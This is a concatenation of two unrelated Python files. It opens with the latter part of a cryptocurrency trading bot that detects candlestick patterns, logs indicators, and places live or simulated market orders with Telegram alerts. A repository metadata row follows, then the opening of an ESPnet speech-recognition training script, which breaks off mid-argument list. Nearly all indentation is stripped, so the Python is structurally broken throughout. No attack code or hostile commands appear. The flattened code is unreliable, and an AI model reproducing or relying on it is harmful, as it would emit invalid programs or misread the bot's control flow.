three_white_soldiers = bool(df_last['three_white_soldiers'].values[0])
three_black_crows = bool(df_last['three_black_crows'].values[0])
morning_star = bool(df_last['morning_star'].values[0])
evening_star = bool(df_last['evening_star'].values[0])
three_line_strike = bool(df_last['three_line_strike'].values[0])
abandoned_baby = bool(df_last['abandoned_baby'].values[0])
morning_doji_star = bool(df_last['morning_doji_star'].values[0])
evening_doji_star = bool(df_last['evening_doji_star'].values[0])
two_black_gapping = bool(df_last['two_black_gapping'].values[0])
strategy = Strategy(app, state, df, state.iterations)
state.action = strategy.getAction()
immediate_action = False
margin, profit, sell_fee = 0, 0, 0
if state.last_buy_size > 0 and state.last_buy_price > 0 and price > 0 and state.last_action == 'BUY':
# update last buy high
if price > state.last_buy_high:
state.last_buy_high = price
if state.last_buy_high > 0:
change_pcnt_high = ((price / state.last_buy_high) - 1) * 100
else:
change_pcnt_high = 0
# buy and sell calculations
state.last_buy_fee = round(state.last_buy_size * app.getTakerFee(), 8)
state.last_buy_filled = round(((state.last_buy_size - state.last_buy_fee) / state.last_buy_price), 8)
# if not a simulation, sync with exchange orders
if not app.isSimulation():
exchange_last_buy = app.getLastBuy()
if exchange_last_buy is not None:
if state.last_buy_size != exchange_last_buy['size']:
state.last_buy_size = exchange_last_buy['size']
if state.last_buy_filled != exchange_last_buy['filled']:
state.last_buy_filled = exchange_last_buy['filled']
if state.last_buy_price != exchange_last_buy['price']:
state.last_buy_price = exchange_last_buy['price']
if app.getExchange() == 'coinbasepro':
if state.last_buy_fee != exchange_last_buy['fee']:
state.last_buy_fee = exchange_last_buy['fee']
margin, profit, sell_fee = calculate_margin(
buy_size=state.last_buy_size,
buy_filled=state.last_buy_filled,
buy_price=state.last_buy_price,
buy_fee=state.last_buy_fee,
sell_percent=app.getSellPercent(),
sell_price=price,
sell_taker_fee=app.getTakerFee())
            # handle immediate sell actions
if strategy.isSellTrigger(price, technical_analysis.getTradeExit(price), margin, change_pcnt_high, obv_pc, macdltsignal):
state.action = 'SELL'
state.last_action = 'BUY'
immediate_action = True
# handle overriding wait actions (do not sell if sell at loss disabled!)
if strategy.isWaitTrigger(margin):
state.action = 'WAIT'
state.last_action = 'BUY'
immediate_action = False
bullbeartext = ''
if app.disableBullOnly() is True or (df_last['sma50'].values[0] == df_last['sma200'].values[0]):
bullbeartext = ''
elif goldencross is True:
bullbeartext = ' (BULL)'
elif goldencross is False:
bullbeartext = ' (BEAR)'
# polling is every 5 minutes (even for hourly intervals), but only process once per interval
if (immediate_action is True or state.last_df_index != current_df_index):
precision = 4
if (price < 0.01):
precision = 8
# Since precision does not change after this point, it is safe to prepare a tailored `truncate()` that would
# work with this precision. It should save a couple of `precision` uses, one for each `truncate()` call.
truncate = functools.partial(_truncate, n=precision)
price_text = 'Close: ' + truncate(price)
ema_text = app.compare(df_last['ema12'].values[0], df_last['ema26'].values[0], 'EMA12/26', precision)
macd_text = ''
if app.disableBuyMACD() is False:
macd_text = app.compare(df_last['macd'].values[0], df_last['signal'].values[0], 'MACD', precision)
obv_text = ''
if app.disableBuyOBV() is False:
obv_text = 'OBV: ' + truncate(df_last['obv'].values[0]) + ' (' + str(
truncate(df_last['obv_pc'].values[0])) + '%)'
state.eri_text = ''
if app.disableBuyElderRay() is False:
if elder_ray_buy is True:
state.eri_text = 'ERI: buy | '
elif elder_ray_sell is True:
state.eri_text = 'ERI: sell | '
else:
state.eri_text = 'ERI: | '
if hammer is True:
log_text = '* Candlestick Detected: Hammer ("Weak - Reversal - Bullish Signal - Up")'
Logger.info(log_text)
if shooting_star is True:
log_text = '* Candlestick Detected: Shooting Star ("Weak - Reversal - Bearish Pattern - Down")'
Logger.info(log_text)
if hanging_man is True:
log_text = '* Candlestick Detected: Hanging Man ("Weak - Continuation - Bearish Pattern - Down")'
Logger.info(log_text)
if inverted_hammer is True:
log_text = '* Candlestick Detected: Inverted Hammer ("Weak - Continuation - Bullish Pattern - Up")'
Logger.info(log_text)
if three_white_soldiers is True:
log_text = '*** Candlestick Detected: Three White Soldiers ("Strong - Reversal - Bullish Pattern - Up")'
Logger.info(log_text)
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') ' + log_text)
if three_black_crows is True:
log_text = '* Candlestick Detected: Three Black Crows ("Strong - Reversal - Bearish Pattern - Down")'
Logger.info(log_text)
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') ' + log_text)
if morning_star is True:
log_text = '*** Candlestick Detected: Morning Star ("Strong - Reversal - Bullish Pattern - Up")'
Logger.info(log_text)
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') ' + log_text)
if evening_star is True:
log_text = '*** Candlestick Detected: Evening Star ("Strong - Reversal - Bearish Pattern - Down")'
Logger.info(log_text)
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') ' + log_text)
if three_line_strike is True:
log_text = '** Candlestick Detected: Three Line Strike ("Reliable - Reversal - Bullish Pattern - Up")'
Logger.info(log_text)
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') ' + log_text)
if abandoned_baby is True:
log_text = '** Candlestick Detected: Abandoned Baby ("Reliable - Reversal - Bullish Pattern - Up")'
Logger.info(log_text)
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') ' + log_text)
if morning_doji_star is True:
log_text = '** Candlestick Detected: Morning Doji Star ("Reliable - Reversal - Bullish Pattern - Up")'
Logger.info(log_text)
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') ' + log_text)
if evening_doji_star is True:
log_text = '** Candlestick Detected: Evening Doji Star ("Reliable - Reversal - Bearish Pattern - Down")'
Logger.info(log_text)
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') ' + log_text)
if two_black_gapping is True:
log_text = '*** Candlestick Detected: Two Black Gapping ("Reliable - Reversal - Bearish Pattern - Down")'
Logger.info(log_text)
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') ' + log_text)
ema_co_prefix = ''
ema_co_suffix = ''
if ema12gtema26co is True:
ema_co_prefix = '*^ '
ema_co_suffix = ' ^*'
elif ema12ltema26co is True:
ema_co_prefix = '*v '
ema_co_suffix = ' v*'
elif ema12gtema26 is True:
ema_co_prefix = '^ '
ema_co_suffix = ' ^'
elif ema12ltema26 is True:
ema_co_prefix = 'v '
ema_co_suffix = ' v'
macd_co_prefix = ''
macd_co_suffix = ''
if app.disableBuyMACD() is False:
if macdgtsignalco is True:
macd_co_prefix = '*^ '
macd_co_suffix = ' ^*'
elif macdltsignalco is True:
macd_co_prefix = '*v '
macd_co_suffix = ' v*'
elif macdgtsignal is True:
macd_co_prefix = '^ '
macd_co_suffix = ' ^'
elif macdltsignal is True:
macd_co_prefix = 'v '
macd_co_suffix = ' v'
obv_prefix = ''
obv_suffix = ''
if app.disableBuyOBV() is False:
if float(obv_pc) > 0:
obv_prefix = '^ '
obv_suffix = ' ^ | '
elif float(obv_pc) < 0:
obv_prefix = 'v '
obv_suffix = ' v | '
if not app.isVerbose():
if state.last_action != '':
output_text = formatted_current_df_index + ' | ' + app.getMarket() + bullbeartext + ' | ' + \
app.printGranularity() + ' | ' + price_text + ' | ' + ema_co_prefix + \
ema_text + ema_co_suffix + ' | ' + macd_co_prefix + macd_text + macd_co_suffix + \
obv_prefix + obv_text + obv_suffix + state.eri_text + ' | ' + state.action + \
' | Last Action: ' + state.last_action
else:
output_text = formatted_current_df_index + ' | ' + app.getMarket() + bullbeartext + ' | ' + \
app.printGranularity() + ' | ' + price_text + ' | ' + ema_co_prefix + \
ema_text + ema_co_suffix + ' | ' + macd_co_prefix + macd_text + macd_co_suffix + \
obv_prefix + obv_text + obv_suffix + state.eri_text + ' | ' + state.action + ' '
if state.last_action == 'BUY':
if state.last_buy_size > 0:
margin_text = truncate(margin) + '%'
else:
margin_text = '0%'
output_text += ' | ' + margin_text + ' (delta: ' + str(round(price - state.last_buy_price, precision)) + ')'
Logger.info(output_text)
# Seasonal Autoregressive Integrated Moving Average (ARIMA) model (ML prediction for 3 intervals from now)
if not app.isSimulation():
try:
prediction = technical_analysis.seasonalARIMAModelPrediction(int(app.getGranularity() / 60) * 3) # 3 intervals from now
Logger.info(f'Seasonal ARIMA model predicts the closing price will be {str(round(prediction[1], 2))} at {prediction[0]} (delta: {round(prediction[1] - price, 2)})')
except:
pass
if state.last_action == 'BUY':
# display support, resistance and fibonacci levels
Logger.info(technical_analysis.printSupportResistanceFibonacciLevels(price))
else:
Logger.debug('-- Iteration: ' + str(state.iterations) + ' --' + bullbeartext)
if state.last_action == 'BUY':
if state.last_buy_size > 0:
margin_text = truncate(margin) + '%'
else:
margin_text = '0%'
Logger.debug('-- Margin: ' + margin_text + ' --')
Logger.debug('price: ' + truncate(price))
Logger.debug('ema12: ' + truncate(float(df_last['ema12'].values[0])))
Logger.debug('ema26: ' + truncate(float(df_last['ema26'].values[0])))
Logger.debug('ema12gtema26co: ' + str(ema12gtema26co))
Logger.debug('ema12gtema26: ' + str(ema12gtema26))
Logger.debug('ema12ltema26co: ' + str(ema12ltema26co))
Logger.debug('ema12ltema26: ' + str(ema12ltema26))
Logger.debug('sma50: ' + truncate(float(df_last['sma50'].values[0])))
Logger.debug('sma200: ' + truncate(float(df_last['sma200'].values[0])))
Logger.debug('macd: ' + truncate(float(df_last['macd'].values[0])))
Logger.debug('signal: ' + truncate(float(df_last['signal'].values[0])))
Logger.debug('macdgtsignal: ' + str(macdgtsignal))
Logger.debug('macdltsignal: ' + str(macdltsignal))
Logger.debug('obv: ' + str(obv))
Logger.debug('obv_pc: ' + str(obv_pc))
Logger.debug('action: ' + state.action)
# informational output on the most recent entry
Logger.info('')
Logger.info('================================================================================')
txt = ' Iteration : ' + str(state.iterations) + bullbeartext
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' Timestamp : ' + str(df_last.index.format()[0])
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
Logger.info('--------------------------------------------------------------------------------')
txt = ' Close : ' + truncate(price)
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' EMA12 : ' + truncate(float(df_last['ema12'].values[0]))
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' EMA26 : ' + truncate(float(df_last['ema26'].values[0]))
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' Crossing Above : ' + str(ema12gtema26co)
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' Currently Above : ' + str(ema12gtema26)
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' Crossing Below : ' + str(ema12ltema26co)
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' Currently Below : ' + str(ema12ltema26)
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
if (ema12gtema26 is True and ema12gtema26co is True):
txt = ' Condition : EMA12 is currently crossing above EMA26'
elif (ema12gtema26 is True and ema12gtema26co is False):
txt = ' Condition : EMA12 is currently above EMA26 and has crossed over'
elif (ema12ltema26 is True and ema12ltema26co is True):
txt = ' Condition : EMA12 is currently crossing below EMA26'
elif (ema12ltema26 is True and ema12ltema26co is False):
txt = ' Condition : EMA12 is currently below EMA26 and has crossed over'
else:
txt = ' Condition : -'
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' SMA20 : ' + truncate(float(df_last['sma20'].values[0]))
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' SMA200 : ' + truncate(float(df_last['sma200'].values[0]))
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
Logger.info('--------------------------------------------------------------------------------')
txt = ' MACD : ' + truncate(float(df_last['macd'].values[0]))
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' Signal : ' + truncate(float(df_last['signal'].values[0]))
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' Currently Above : ' + str(macdgtsignal)
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
txt = ' Currently Below : ' + str(macdltsignal)
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
if (macdgtsignal is True and macdgtsignalco is True):
txt = ' Condition : MACD is currently crossing above Signal'
elif (macdgtsignal is True and macdgtsignalco is False):
txt = ' Condition : MACD is currently above Signal and has crossed over'
elif (macdltsignal is True and macdltsignalco is True):
txt = ' Condition : MACD is currently crossing below Signal'
elif (macdltsignal is True and macdltsignalco is False):
txt = ' Condition : MACD is currently below Signal and has crossed over'
else:
txt = ' Condition : -'
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
Logger.info('--------------------------------------------------------------------------------')
txt = ' Action : ' + state.action
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
Logger.info('================================================================================')
if state.last_action == 'BUY':
txt = ' Margin : ' + margin_text
Logger.info(' | ' + txt + (' ' * (75 - len(txt))) + ' | ')
Logger.info('================================================================================')
# if a buy signal
if state.action == 'BUY':
state.last_buy_price = price
state.last_buy_high = state.last_buy_price
# if live
if app.isLive():
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') BUY at ' + price_text)
if not app.isVerbose():
Logger.info(formatted_current_df_index + ' | ' + app.getMarket() + ' | ' + app.printGranularity() + ' | ' + price_text + ' | BUY')
else:
Logger.info('--------------------------------------------------------------------------------')
Logger.info('| *** Executing LIVE Buy Order *** |')
Logger.info('--------------------------------------------------------------------------------')
# display balances
Logger.info(app.getBaseCurrency() + ' balance before order: ' + str(account.getBalance(app.getBaseCurrency())))
Logger.info(app.getQuoteCurrency() + ' balance before order: ' + str(account.getBalance(app.getQuoteCurrency())))
# execute a live market buy
state.last_buy_size = float(account.getBalance(app.getQuoteCurrency()))
if app.getBuyMaxSize() and state.last_buy_size > app.getBuyMaxSize():
state.last_buy_size = app.getBuyMaxSize()
resp = app.marketBuy(app.getMarket(), state.last_buy_size, app.getBuyPercent())
Logger.debug(resp)
# display balances
Logger.info(app.getBaseCurrency() + ' balance after order: ' + str(account.getBalance(app.getBaseCurrency())))
Logger.info(app.getQuoteCurrency() + ' balance after order: ' + str(account.getBalance(app.getQuoteCurrency())))
# if not live
else:
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') TEST BUY at ' + price_text)
# TODO: Improve simulator calculations by including calculations for buy and sell limit configurations.
if state.last_buy_size == 0 and state.last_buy_filled == 0:
state.last_buy_size = 1000
state.first_buy_size = 1000
state.buy_count = state.buy_count + 1
state.buy_sum = state.buy_sum + state.last_buy_size
if not app.isVerbose():
Logger.info(formatted_current_df_index + ' | ' + app.getMarket() + ' | ' + app.printGranularity() + ' | ' + price_text + ' | BUY')
bands = technical_analysis.getFibonacciRetracementLevels(float(price))
Logger.info(' Fibonacci Retracement Levels:' + str(bands))
technical_analysis.printSupportResistanceLevel(float(price))
if len(bands) >= 1 and len(bands) <= 2:
if len(bands) == 1:
first_key = list(bands.keys())[0]
if first_key == 'ratio1':
state.fib_low = 0
state.fib_high = bands[first_key]
if first_key == 'ratio1_618':
state.fib_low = bands[first_key]
state.fib_high = bands[first_key] * 2
else:
state.fib_low = bands[first_key]
elif len(bands) == 2:
first_key = list(bands.keys())[0]
second_key = list(bands.keys())[1]
state.fib_low = bands[first_key]
state.fib_high = bands[second_key]
else:
Logger.info('--------------------------------------------------------------------------------')
Logger.info('| *** Executing TEST Buy Order *** |')
Logger.info('--------------------------------------------------------------------------------')
if app.shouldSaveGraphs():
tradinggraphs = TradingGraphs(technical_analysis)
ts = datetime.now().timestamp()
filename = app.getMarket() + '_' + app.printGranularity() + '_buy_' + str(ts) + '.png'
tradinggraphs.renderEMAandMACD(len(trading_data), 'graphs/' + filename, True)
# if a sell signal
elif state.action == 'SELL':
# if live
if app.isLive():
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') SELL at ' +
price_text + ' (margin: ' + margin_text + ', (delta: ' +
str(round(price - state.last_buy_price, precision)) + ')')
if not app.isVerbose():
Logger.info(formatted_current_df_index + ' | ' + app.getMarket() + ' | ' + app.printGranularity() + ' | ' + price_text + ' | SELL')
bands = technical_analysis.getFibonacciRetracementLevels(float(price))
Logger.info(' Fibonacci Retracement Levels:' + str(bands))
if len(bands) >= 1 and len(bands) <= 2:
if len(bands) == 1:
first_key = list(bands.keys())[0]
if first_key == 'ratio1':
state.fib_low = 0
state.fib_high = bands[first_key]
if first_key == 'ratio1_618':
state.fib_low = bands[first_key]
state.fib_high = bands[first_key] * 2
else:
state.fib_low = bands[first_key]
elif len(bands) == 2:
first_key = list(bands.keys())[0]
second_key = list(bands.keys())[1]
state.fib_low = bands[first_key]
state.fib_high = bands[second_key]
else:
Logger.info('--------------------------------------------------------------------------------')
Logger.info('| *** Executing LIVE Sell Order *** |')
Logger.info('--------------------------------------------------------------------------------')
# display balances
Logger.info(app.getBaseCurrency() + ' balance before order: ' + str(account.getBalance(app.getBaseCurrency())))
Logger.info(app.getQuoteCurrency() + ' balance before order: ' + str(account.getBalance(app.getQuoteCurrency())))
# execute a live market sell
resp = app.marketSell(app.getMarket(), float(account.getBalance(app.getBaseCurrency())),
app.getSellPercent())
Logger.debug(resp)
# display balances
Logger.info(app.getBaseCurrency() + ' balance after order: ' + str(account.getBalance(app.getBaseCurrency())))
Logger.info(app.getQuoteCurrency() + ' balance after order: ' + str(account.getBalance(app.getQuoteCurrency())))
# if not live
else:
margin, profit, sell_fee = calculate_margin(
buy_size=state.last_buy_size,
buy_filled=state.last_buy_filled,
buy_price=state.last_buy_price,
buy_fee=state.last_buy_fee,
sell_percent=app.getSellPercent(),
sell_price=price,
sell_taker_fee=app.getTakerFee())
if state.last_buy_size > 0:
margin_text = truncate(margin) + '%'
else:
margin_text = '0%'
app.notifyTelegram(app.getMarket() + ' (' + app.printGranularity() + ') TEST SELL at ' +
price_text + ' (margin: ' + margin_text + ', (delta: ' +
str(round(price - state.last_buy_price, precision)) + ')')
# Preserve next buy values for simulator
state.sell_count = state.sell_count + 1
buy_size = ((app.getSellPercent() / 100) * ((price / state.last_buy_price) * (state.last_buy_size - state.last_buy_fee)))
state.last_buy_size = buy_size - sell_fee
state.sell_sum = state.sell_sum + state.last_buy_size
if not app.isVerbose():
if price > 0:
margin_text = truncate(margin) + '%'
else:
margin_text = '0%'
Logger.info(formatted_current_df_index + ' | ' + app.getMarket() + ' | ' +
app.printGranularity() + ' | SELL | ' + str(price) + ' | BUY | ' +
str(state.last_buy_price) + ' | DIFF | ' + str(price - state.last_buy_price) +
' | DIFF | ' + str(profit) + ' | MARGIN NO FEES | ' +
margin_text + ' | MARGIN FEES | ' + str(round(sell_fee, precision)))
else:
Logger.info('--------------------------------------------------------------------------------')
Logger.info('| *** Executing TEST Sell Order *** |')
Logger.info('--------------------------------------------------------------------------------')
if app.shouldSaveGraphs():
tradinggraphs = TradingGraphs(technical_analysis)
ts = datetime.now().timestamp()
filename = app.getMarket() + '_' + app.printGranularity() + '_sell_' + str(ts) + '.png'
tradinggraphs.renderEMAandMACD(len(trading_data), 'graphs/' + filename, True)
# last significant action
if state.action in ['BUY', 'SELL']:
state.last_action = state.action
state.last_df_index = str(df_last.index.format()[0])
if not app.isLive() and state.iterations == len(df):
Logger.info("\nSimulation Summary: ")
if state.buy_count > state.sell_count and app.allowSellAtLoss():
# Calculate last sell size
state.last_buy_size = ((app.getSellPercent() / 100) * ((price / state.last_buy_price) * (state.last_buy_size - state.last_buy_fee)))
# Reduce sell fee from last sell size
state.last_buy_size = state.last_buy_size - state.last_buy_price * app.getTakerFee()
state.sell_sum = state.sell_sum + state.last_buy_size
state.sell_count = state.sell_count + 1
elif state.buy_count > state.sell_count and not app.allowSellAtLoss():
Logger.info("\n")
Logger.info(' Note : "sell at loss" is disabled and you have an open trade, if the margin')
Logger.info(' result below is negative it will assume you sold at the end of the')
Logger.info(' simulation which may not be ideal. Try setting --sellatloss 1')
Logger.info("\n")
Logger.info(' Buy Count : ' + str(state.buy_count))
Logger.info(' Sell Count : ' + str(state.sell_count))
Logger.info(' First Buy : ' + str(state.first_buy_size))
Logger.info(' Last Sell : ' + str(state.last_buy_size))
app.notifyTelegram(f"Simulation Summary\n Buy Count: {state.buy_count}\n Sell Count: {state.sell_count}\n First Buy: {state.first_buy_size}\n Last Sell: {state.last_buy_size}\n")
if state.sell_count > 0:
Logger.info("\n")
Logger.info(' Margin : ' + _truncate((((state.last_buy_size - state.first_buy_size) / state.first_buy_size) * 100), 4) + '%')
Logger.info("\n")
Logger.info(' ** non-live simulation, assuming highest fees')
app.notifyTelegram(f" Margin: {_truncate((((state.last_buy_size - state.first_buy_size) / state.first_buy_size) * 100), 4)}%\n ** non-live simulation, assuming highest fees\n")
else:
if state.last_buy_size > 0 and state.last_buy_price > 0 and price > 0 and state.last_action == 'BUY':
# show profit and margin if already bought
Logger.info(now + ' | ' + app.getMarket() + bullbeartext + ' | ' + app.printGranularity() + ' | Current Price: ' + str(price) + ' | Margin: ' + str(margin) + ' | Profit: ' + str(profit))
else:
Logger.info(now + ' | ' + app.getMarket() + bullbeartext + ' | ' + app.printGranularity() + ' | Current Price: ' + str(price))
# decrement ignored iteration
state.iterations = state.iterations - 1
# if live
if not app.disableTracker() and app.isLive():
# update order tracker csv
if app.getExchange() == 'binance':
account.saveTrackerCSV(app.getMarket())
elif app.getExchange() == 'coinbasepro':
account.saveTrackerCSV()
if app.isSimulation():
if state.iterations < 300:
if app.simuluationSpeed() in ['fast', 'fast-sample']:
# fast processing
list(map(s.cancel, s.queue))
s.enter(0, 1, executeJob, (sc, app, state, df))
else:
# slow processing
list(map(s.cancel, s.queue))
s.enter(1, 1, executeJob, (sc, app, state, df))
else:
# poll every 1 minute
list(map(s.cancel, s.queue))
s.enter(60, 1, executeJob, (sc, app, state))
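# Worked example of the simulator's position roll-over in the test-sell branch above
# (all numbers are hypothetical): with sell percent 100, a last buy size of 1000, a buy
# fee of 2.5, a buy price of 100 and a sell price of 110, the next buy size before the
# sell fee is (100 / 100) * (110 / 100) * (1000 - 2.5) = 1097.25, and the sell fee
# returned by calculate_margin() is then subtracted from that figure.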
def main():
try:
message = 'Starting '
if app.getExchange() == 'coinbasepro':
message += 'Coinbase Pro bot'
elif app.getExchange() == 'binance':
message += 'Binance bot'
message += ' for ' + app.getMarket() + ' using granularity ' + app.printGranularity()
app.notifyTelegram(message)
# initialise and start application
trading_data = app.startApp(account, state.last_action)
def runApp():
# run the first job immediately after starting
if app.isSimulation():
executeJob(s, app, state, trading_data)
else:
executeJob(s, app, state)
s.run()
try:
runApp()
except KeyboardInterrupt:
raise
except(BaseException, Exception) as e:
if app.autoRestart():
# Wait 30 second and try to relaunch application
time.sleep(30)
Logger.critical('Restarting application after exception: ' + repr(e))
app.notifyTelegram('Auto restarting bot for ' + app.getMarket() + ' after exception: ' + repr(e))
# Cancel the events queue
map(s.cancel, s.queue)
# Restart the app
runApp()
else:
raise
# catches a keyboard break of app, exits gracefully
except KeyboardInterrupt:
Logger.warning(str(datetime.now()) + ' bot is closed via keyboard interrupt...')
try:
sys.exit(0)
except SystemExit:
os._exit(0)
except(BaseException, Exception) as e:
# catch all not managed exceptions and send a Telegram message if configured
app.notifyTelegram('Bot for ' + app.getMarket() + ' got an exception: ' + repr(e))
Logger.critical(repr(e))
raise
main()
| 51.137376 | 202 | 0.504417 | ["Apache-2.0"] | treggit/pycryptobot | pycryptobot.py | 41,319 | Python
#!/usr/bin/env python3
# encoding: utf-8
# Copyright 2017 Tomoki Hayashi (Nagoya University)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""Automatic speech recognition model training script."""
import logging
import os
import random
import subprocess
import sys
from distutils.version import LooseVersion
import configargparse
import numpy as np
import torch
from espnet.utils.cli_utils import strtobool
from espnet.utils.training.batchfy import BATCH_COUNT_CHOICES
is_torch_1_2_plus = LooseVersion(torch.__version__) >= LooseVersion("1.2")
# NOTE: you need this func to generate our sphinx doc
def get_parser(parser=None, required=True):
"""Get default arguments."""
if parser is None:
parser = configargparse.ArgumentParser(
description="Train an automatic speech recognition (ASR) model on one CPU, "
"one or multiple GPUs",
config_file_parser_class=configargparse.YAMLConfigFileParser,
formatter_class=configargparse.ArgumentDefaultsHelpFormatter,
)
# general configuration
parser.add("--config", is_config_file=True, help="config file path")
parser.add(
"--config2",
is_config_file=True,
help="second config file path that overwrites the settings in `--config`.",
)
parser.add(
"--config3",
is_config_file=True,
help="third config file path that overwrites the settings in "
"`--config` and `--config2`.",
)
parser.add_argument(
"--ngpu",
default=None,
type=int,
help="Number of GPUs. If not given, use all visible devices",
)
parser.add_argument(
"--train-dtype",
default="float32",
choices=["float16", "float32", "float64", "O0", "O1", "O2", "O3"],
help="Data type for training (only pytorch backend). "
"O0,O1,.. flags require apex. "
"See https://nvidia.github.io/apex/amp.html#opt-levels",
)
parser.add_argument(
"--backend",
default="chainer",
type=str,
choices=["chainer", "pytorch"],
help="Backend library",
)
parser.add_argument(
"--outdir", type=str, required=required, help="Output directory"
)
parser.add_argument("--debugmode", default=1, type=int, help="Debugmode")
parser.add_argument("--dict", required=required, help="Dictionary")
parser.add_argument("--seed", default=1, type=int, help="Random seed")
parser.add_argument("--debugdir", type=str, help="Output directory for debugging")
parser.add_argument(
"--resume",
"-r",
default="",
nargs="?",
help="Resume the training from snapshot",
)
parser.add_argument(
"--minibatches",
"-N",
type=int,
default="-1",
help="Process only N minibatches (for debug)",
)
parser.add_argument("--verbose", "-V", default=0, type=int, help="Verbose option")
parser.add_argument(
"--tensorboard-dir",
default=None,
type=str,
nargs="?",
help="Tensorboard log dir path",
)
parser.add_argument(
"--report-interval-iters",
default=100,
type=int,
help="Report interval iterations",
)
parser.add_argument(
"--save-interval-iters",
default=0,
type=int,
help="Save snapshot interval iterations",
)
# task related
parser.add_argument(
"--train-json",
type=str,
default=None,
help="Filename of train label data (json)",
)
parser.add_argument(
"--valid-json",
type=str,
default=None,
help="Filename of validation label data (json)",
)
# network architecture
parser.add_argument(
"--model-module",
type=str,
default=None,
help="model defined module (default: espnet.nets.xxx_backend.e2e_asr:E2E)",
)
# encoder
parser.add_argument(
"--num-encs", default=1, type=int, help="Number of encoders in the model."
)
# loss related
parser.add_argument(
"--ctc_type",
default="warpctc",
type=str,
choices=["builtin", "warpctc"],
help="Type of CTC implementation to calculate loss.",
)
parser.add_argument(
"--mtlalpha",
default=0.5,
type=float,
help="Multitask learning coefficient, "
"alpha: alpha*ctc_loss + (1-alpha)*att_loss ",
)
parser.add_argument(
"--lsm-weight", default=0.0, type=float, help="Label smoothing weight"
)
# recognition options to compute CER/WER
parser.add_argument(
"--report-cer",
default=False,
action="store_true",
help="Compute CER on development set",
)
parser.add_argument(
"--report-wer",
default=False,
action="store_true",
help="Compute WER on development set",
)
parser.add_argument("--nbest", type=int, default=1, help="Output N-best hypotheses")
parser.add_argument("--beam-size", type=int, default=4, help="Beam size")
parser.add_argument("--penalty", default=0.0, type=float, help="Incertion penalty")
parser.add_argument(
"--maxlenratio",
default=0.0,
type=float,
help="""Input length ratio to obtain max output length.
        If maxlenratio=0.0 (default), it uses an end-detect function
to automatically find maximum hypothesis lengths""",
)
parser.add_argument(
"--minlenratio",
default=0.0,
type=float,
help="Input length ratio to obtain min output length",
)
parser.add_argument(
"--ctc-weight", default=0.3, type=float, help="CTC weight in joint decoding"
)
parser.add_argument(
"--rnnlm", type=str, default=None, help="RNNLM model file to read"
)
parser.add_argument(
"--rnnlm-conf", type=str, default=None, help="RNNLM model config file to read"
)
parser.add_argument("--lm-weight", default=0.1, type=float, help="RNNLM weight.")
parser.add_argument("--sym-space", default="<space>", type=str, help="Space symbol")
parser.add_argument("--sym-blank", default="<blank>", type=str, help="Blank symbol")
# minibatch related
parser.add_argument(
"--sortagrad",
default=0,
type=int,
nargs="?",
help="How many epochs to use sortagrad for. 0 = deactivated, -1 = all epochs",
)
parser.add_argument(
"--batch-count",
default="auto",
choices=BATCH_COUNT_CHOICES,
help="How to count batch_size. "
"The default (auto) will find how to count by args.",
)
parser.add_argument(
"--batch-size",
"--batch-seqs",
"-b",
default=0,
type=int,
help="Maximum seqs in a minibatch (0 to disable)",
)
parser.add_argument(
"--batch-bins",
default=0,
type=int,
help="Maximum bins in a minibatch (0 to disable)",
)
parser.add_argument(
"--batch-frames-in",
default=0,
type=int,
help="Maximum input frames in a minibatch (0 to disable)",
)
parser.add_argument(
"--batch-frames-out",
default=0,
type=int,
help="Maximum output frames in a minibatch (0 to disable)",
)
parser.add_argument(
"--batch-frames-inout",
default=0,
type=int,
help="Maximum input+output frames in a minibatch (0 to disable)",
)
parser.add_argument(
"--maxlen-in",
"--batch-seq-maxlen-in",
default=800,
type=int,
metavar="ML",
help="When --batch-count=seq, "
"batch size is reduced if the input sequence length > ML.",
)
parser.add_argument(
"--maxlen-out",
"--batch-seq-maxlen-out",
default=150,
type=int,
metavar="ML",
help="When --batch-count=seq, "
"batch size is reduced if the output sequence length > ML",
)
parser.add_argument(
"--n-iter-processes",
default=0,
type=int,
help="Number of processes of iterator",
)
parser.add_argument(
"--preprocess-conf",
type=str,
default=None,
nargs="?",
help="The configuration file for the pre-processing",
)
# optimization related
parser.add_argument(
"--opt",
default="adadelta",
type=str,
choices=["adadelta", "adam", "noam"],
help="Optimizer",
)
parser.add_argument(
"--accum-grad", default=1, type=int, help="Number of gradient accumuration"
)
parser.add_argument(
"--eps", default=1e-8, type=float, help="Epsilon constant for optimizer"
)
parser.add_argument(
"--eps-decay", default=0.01, type=float, help="Decaying ratio of epsilon"
)
parser.add_argument(
"--weight-decay", default=0.0, type=float, help="Weight decay ratio"
)
parser.add_argument(
